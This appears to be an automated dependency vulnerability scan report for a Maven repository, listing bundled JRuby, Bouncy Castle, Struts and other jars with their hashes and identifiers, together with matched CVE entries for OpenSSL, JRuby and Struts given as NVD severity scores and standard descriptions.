The regular expression engine in JRuby before 1.4.1, when $KCODE is set to 'u', does not properly handle characters immediately after a UTF-8 character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.

Vulnerable Software & Versions:

CVE-2010-0742  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors.

Vulnerable Software & Versions:

CVE-2010-0433  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.

Vulnerable Software & Versions:

CVE-2009-4355  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.

Vulnerable Software & Versions:

CVE-2009-3555  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.

Vulnerable Software & Versions:

CVE-2009-3245  

Severity: High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

OpenSSL before 0.9.8m does not check for a NULL return value from bn_wexpand function calls in (1) crypto/bn/bn_div.c, (2) crypto/bn/bn_gf2m.c, (3) crypto/ec/ec2_smpl.c, and (4) engines/e_ubsec.c, which has unspecified impact and context-dependent attack vectors.

Vulnerable Software & Versions:

CVE-2009-1387  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a "fragment bug."

Vulnerable Software & Versions:

CVE-2009-1378  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka "DTLS fragment handling memory leak."

Vulnerable Software & Versions:

CVE-2009-1377  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of "future epoch" DTLS records that are buffered in a queue, aka "DTLS record buffer limitation bug."

Vulnerable Software & Versions:

CVE-2009-0789  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

OpenSSL before 0.9.8k on WIN64 and certain other platforms does not properly handle a malformed ASN.1 structure, which allows remote attackers to cause a denial of service (invalid memory access and application crash) by placing this structure in the public key of a certificate, as demonstrated by an RSA public key.

Vulnerable Software & Versions:

CVE-2009-0590  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The ASN1_STRING_print_ex function in OpenSSL before 0.9.8k allows remote attackers to cause a denial of service (invalid memory access and application crash) via vectors that trigger printing of a (1) BMPString or (2) UniversalString with an invalid encoded length.

Vulnerable Software & Versions:

CVE-2008-7270  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8j, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of a disabled cipher via vectors involving sniffing network traffic to discover a session identifier, a different vulnerability than CVE-2010-4180.

Vulnerable Software & Versions:

CVE-2008-5077  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CWE: CWE-20 Improper Input Validation

OpenSSL 0.9.8i and earlier does not properly check the return value from the EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys.

Vulnerable Software & Versions:

CVE-2007-5536  

Severity: Medium
CVSS Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)

Unspecified vulnerability in OpenSSL before A.00.09.07l on HP-UX B.11.11, B.11.23, and B.11.31 allows local users to cause a denial of service via unspecified vectors.

Vulnerable Software & Versions:

CVE-2007-3108  

Severity: Low
CVSS Score: 1.2 (AV:L/AC:H/Au:N/C:P/I:N/A:N)

The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys.

Vulnerable Software & Versions:

CVE-2006-7250  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The mime_hdr_cmp function in crypto/asn1/asn_mime.c in OpenSSL 0.9.8t and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message.

Vulnerable Software & Versions:

CVE-2006-4343  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

Vulnerable Software & Versions:

CVE-1999-0428  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls.

Vulnerable Software & Versions:

jruby-complete-9.1.2.0.jar: generator.jar

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/json/ext/generator.jar
MD5: 9a3d59c751290cace181e8de11a41755
SHA1: b5129f6559d9a45e91c39f2b9adcba8b2a823200

Identifiers

  • None

jruby-complete-9.1.2.0.jar: parser.jar

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/json/ext/parser.jar
MD5: 5d68c415bab614f7022b579f31fb850c
SHA1: ec58e349d82741d32b381f86b3a2e18892160aff

Identifiers

  • None

jruby-complete-9.1.2.0.jar: bcpkix-jdk15on-1.54.jar

Description: The Bouncy Castle Java APIs for CMS, PKCS, EAC, TSP, CMP, CRMF, OCSP, and certificate generation. This jar contains APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs.

License:

Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/org/bouncycastle/bcpkix-jdk15on/1.54/bcpkix-jdk15on-1.54.jar
MD5: ea8e906cfcda284d0ae934b82863862d
SHA1: b11bfee99bb11eea344de6e4a07fe89212c55c02

Identifiers

jruby-complete-9.1.2.0.jar: bcprov-jdk15on-1.54.jar

Description: The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.

License:

Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/org/bouncycastle/bcprov-jdk15on/1.54/bcprov-jdk15on-1.54.jar
MD5: 66a9905f98513cc5e53eabcc9af3c0fb
SHA1: 1acdedeb89f1d950d67b73d481eb7736df65eedb

Identifiers

  • cpe: cpe:/a:bouncycastle:bouncy-castle-crypto-package:1.54   Confidence:LOW   
  • cpe: cpe:/a:bouncycastle:bouncy_castle_crypto_package:1.54   Confidence:LOW   
  • maven: org.bouncycastle:bcprov-jdk15on:1.54   Confidence:HIGHEST

jruby-complete-9.1.2.0.jar: snakeyaml-1.14.jar

Description: YAML 1.1 parser and emitter for Java

License:

Apache License Version 2.0: LICENSE.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/org/yaml/snakeyaml/1.14/snakeyaml-1.14.jar
MD5: 1dd614fe1f1d9b6b5ef0fd2c1857e659
SHA1: c2df91929ed06a25001939929bff5120e0ea3fd4

Identifiers

jruby-complete-9.1.2.0.jar: psych.jar

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/psych.jar
MD5: 819c4b99eefabe587bbdfe8d2b2ee30d
SHA1: 7576dce2febe3a3dfde6d7d27a933da4d3ee7d4e

Identifiers

  • None

jruby-complete-9.1.2.0.jar: cparse-jruby.jar

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/racc/cparse-jruby.jar
MD5: 1d12831e62f838a59abb7b44a20c8686
SHA1: c5b876825b6cbe622111b07fc205515a2f782615

Identifiers

  • cpe: cpe:/a:jruby:jruby:-   Confidence:LOW

CVE-2012-5370

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

CVE-2011-4838

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

Vulnerable Software & Versions:

CVE-2010-1330

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The regular expression engine in JRuby before 1.4.1, when $KCODE is set to 'u', does not properly handle characters immediately after a UTF-8 character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.

Vulnerable Software & Versions:

jruby-complete-9.1.2.0.jar: readline.jar

Description: readline extension for JRuby

License:

EPL-1.0
GPL-2.0
LGPL-2.1
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/readline.jar
MD5: 3e17099e843af31aec71300a22794da1
SHA1: ad217fe9fd89970a34877b129bf9f4e0baff6469

Identifiers

  • cpe: cpe:/a:jruby:jruby:1.0   Confidence:HIGHEST
  • maven: rubygems:jruby-readline:1.0   Confidence:HIGH

CVE-2012-5370

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

CVE-2011-4838

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

Vulnerable Software & Versions:

CVE-2010-1330

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The regular expression engine in JRuby before 1.4.1, when $KCODE is set to 'u', does not properly handle characters immediately after a UTF-8 character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.

Vulnerable Software & Versions:

jruby-complete-9.1.2.0.jar: pr-zlib.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/truffle/pr-zlib/pr-zlib.gemspec
MD5: b4e286bddea3a9392a84741e887e8502
SHA1: e3998ae59fc214d52e03f21f7f72e6e93efb64bb

Identifiers

  • None

jruby-complete-9.1.2.0.jar: Rakefile

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/truffle/pr-zlib/Rakefile
MD5: 923ba4c739f59fa2b6868c442a4da16c
SHA1: 5c2705b05dd5c7f5d4927a864d3a36f4aef93017

Identifiers

  • None

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jffi/pom.xml

Description: Java Foreign Function Interface

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jffi/pom.xml
MD5: 1c0502b6d6f7a10b845979d2c4cdf6fa
SHA1: 5f9a05c00109c43896a44172aa04a4d4d9282d8d

Identifiers

  • maven: com.github.jnr:jffi:1.2.12   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-constants/pom.xml

Description: A set of platform constants (e.g. errno values)

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-constants/pom.xml
MD5: 90174e1e8e19f098ab2883d2de643cf5
SHA1: 2c34ee3a1470585746ae4b6eab16431c8ce3ed39

Identifiers

  • maven: com.github.jnr:jnr-constants:0.9.2   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-enxio/pom.xml

Description: Native I/O access for java

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-enxio/pom.xml
MD5: 9ebe3a4c20429571e7cda7283de9fb81
SHA1: 852badae5cc6b00220178ccc3559ed1fbde68cbb

Identifiers

  • maven: com.github.jnr:jnr-enxio:0.12   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-ffi/pom.xml

Description: A library for invoking native functions from java

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-ffi/pom.xml
MD5: 5a0daa9bba2f3e56d98ee20d19308eb0
SHA1: baf89fc73a1b3f6ebda9692670e8c2d62abf0e13

Identifiers

  • maven: com.github.jnr:jnr-ffi:2.0.9   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-netdb/pom.xml

Description: Lookup TCP and UDP services from java

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-netdb/pom.xml
MD5: 65c022a7f167f37c216e0620fcf04716
SHA1: 8d6ba3148bc79c4de8fe1db2f0b0e21e69556b76

Identifiers

  • maven: com.github.jnr:jnr-netdb:1.1.5   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-posix/pom.xml

Description: Common cross-project/cross-platform POSIX APIs

License:

Common Public License - v 1.0: http://www-128.ibm.com/developerworks/library/os-cpl.html
GNU General Public License Version 2: http://www.gnu.org/copyleft/gpl.html
GNU Lesser General Public License Version 2.1: http://www.gnu.org/licenses/lgpl.html
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-posix/pom.xml
MD5: 4b9b9e407a133c8fd39a04108776152e
SHA1: 41ef86131a193c69f6e91a20f27882729ec0cf19

Identifiers

  • maven: com.github.jnr:jnr-posix:3.0.29   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-unixsocket/pom.xml

Description: Native I/O access for java

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-unixsocket/pom.xml
MD5: e75aa0f8e3affdf8ec18f03dd1a1c03d
SHA1: e4e84bb8c92f4baaaad22313b006e2b889899b11

Identifiers

  • maven: com.github.jnr:jnr-unixsocket:0.12   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-x86asm/pom.xml

Description: A pure-java X86 and X86_64 assembler

License:

MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-x86asm/pom.xml
MD5: cb16b0b890c8b7a726a547ca0b58d00a
SHA1: 91de5c25955d1f321832738dce614b45e9939050

Identifiers

  • maven: com.github.jnr:jnr-x86asm:1.0.2   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/invokebinder/pom.xml

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/invokebinder/pom.xml
MD5: c89653bd4f654c04cd93caf555aa7aaa
SHA1: b13f370cefa8331b42c00dade00424e483a3d267

Identifiers

  • maven: com.headius:invokebinder:1.7   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/options/pom.xml

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/options/pom.xml
MD5: 71910d212b33ca5f3f5a8a2aff7c8785
SHA1: 51766d35193ffa3f9c131d574cf2570447607b95

Identifiers

  • maven: com.headius:options:1.4   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.jcraft/jzlib/pom.xml

Description: JZlib is a re-implementation of zlib in pure Java

License:

BSD: http://www.jcraft.com/jzlib/LICENSE.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.jcraft/jzlib/pom.xml
MD5: 856f139610c4e36c1b0bdb5ad007c2a5
SHA1: 6e6789004c70477a6e2ea92c066b757534e63a10

Identifiers

  • maven: com.jcraft:jzlib:1.1.3   Confidence:HIGH
  • cpe: cpe:/a:jcraft:jzlib:1.1.3   Confidence:LOW

jruby-complete-9.1.2.0.jar/META-INF/maven/com.martiansoftware/nailgun-server/pom.xml

Description: Nailgun is a client, protocol, and server for running Java programs from the command line without incurring the JVM startup overhead. Programs run in the server (which is implemented in Java), and are triggered by the client (written in C), which handles all I/O. This project contains the SERVER ONLY.

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.martiansoftware/nailgun-server/pom.xml
MD5: 365276754761735cc069e439a401fa8d
SHA1: 55ac54d56cbaa9468e964f4dc20b201cde1c611f

Identifiers

  • maven: com.martiansoftware:nailgun-server:0.9.1   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/joda-time/joda-time/pom.xml

Description: Date and time library to replace JDK date handling

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/joda-time/joda-time/pom.xml
MD5: e0e06bb183b503c9226aca0fe8a3f0fd
SHA1: f8df631ef5c18b7bc8560f7afb897cc6d9166067

Identifiers

  • maven: joda-time:joda-time:2.8.2   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/org.jruby.joni/joni/pom.xml

Description: Java port of Oniguruma: http://www.geocities.jp/kosako3/oniguruma that uses byte arrays directly instead of java Strings and chars

License:

MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/org.jruby.joni/joni/pom.xml
MD5: 56582bba936c240658e561a53341590a
SHA1: d82a6ef409ac9f8dd68221f0db02eb4880ab0b82

Identifiers

  • maven: org.jruby.joni:joni:2.1.10   Confidence:HIGH

plexus-cipher-1.4.jar

File Path: /var/tmp/maven-repo/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar
MD5: 7b2d6fcf0d5800d5b1ce09d98d98dcaf
SHA1: 50ade46f23bb38cd984b4ec560c46223432aac38
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-sec-dispatcher-1.3.jar

File Path: /var/tmp/maven-repo/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar
MD5: 53160199f5667de3fca69b723173639b
SHA1: dedc02034fb8fcd7615d66593228cb71709134b4
Referenced In Project: Sass Compiler Plugin

Identifiers

oro-2.0.8.jar

File Path: /var/tmp/maven-repo/oro/oro/2.0.8/oro-2.0.8.jar
MD5: 42e940d5d2d822f4dc04c65053e630ab
SHA1: 5592374f834645c4ae250f4c9fbb314c9369d698
Referenced In Project: Sass Compiler Plugin

Identifiers

sslext-1.2-0.jar

License:

Apache Software License, Version 1.1: http://www.apache.org/licenses/LICENSE-1.1
File Path: /var/tmp/maven-repo/sslext/sslext/1.2-0/sslext-1.2-0.jar
MD5: fda7f2a2f7ac9b017a5de1a4742753fd
SHA1: c86a7db4ac0bc450e675f3d44b3d64cdc934361b
Referenced In Project: Sass Compiler Plugin

Identifiers

  • cpe: cpe:/a:apache:struts:1.2.0   Confidence:LOW
  • maven: sslext:sslext:1.2-0   Confidence:HIGHEST

CVE-2006-1548

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.

Vulnerable Software & Versions:

CVE-2006-1547

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)

ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.

Vulnerable Software & Versions:

CVE-2006-1546

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.

Vulnerable Software & Versions:

xmlunit-1.5.jar

Description: XMLUnit compares a control XML document to a test document or the result of a transformation, validates documents, and compares the results of XPath expressions.

License:

BSD License: http://xmlunit.svn.sourceforge.net/viewvc/*checkout*/xmlunit/trunk/xmlunit/LICENSE.txt
File Path: /var/tmp/maven-repo/xmlunit/xmlunit/1.5/xmlunit-1.5.jar
MD5: 99f2eb164a7609da9a77975843b09405
SHA1: 7789cef5caffdecab50fd6099535ad2bc2e98044
Referenced In Project: Sass Compiler Plugin

Identifiers

This report contains data retrieved from the National Vulnerability Database.